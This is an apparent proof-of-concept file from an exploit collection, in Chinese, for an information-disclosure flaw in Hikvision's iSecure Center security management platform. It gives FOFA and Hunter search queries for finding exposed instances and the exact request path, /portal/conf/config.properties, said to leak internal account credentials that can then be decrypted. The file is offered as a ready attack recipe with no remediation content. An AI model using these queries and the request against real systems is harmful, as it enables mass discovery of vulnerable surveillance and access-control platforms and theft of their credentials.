POC00/海康威视综合安防管理平台信息泄露.md

23 lines
602 B
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 海康威视综合安防管理平台信息泄露
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台通过接入视频监控、一卡通、停车场、报警检测等系统的设备海康威视综合安防管理平台信息存在信息泄露内网集权账户密码漏洞可以通过解密软件解密用户名密码。
## fofa
```
app="HIKVISION-综合安防管理平台"
```
## hunter
```
web.title="综合安防管理平台"
```
## poc
```
/portal/conf/config.properties
```
## 漏洞复现
![](./assets/20231021220812.png)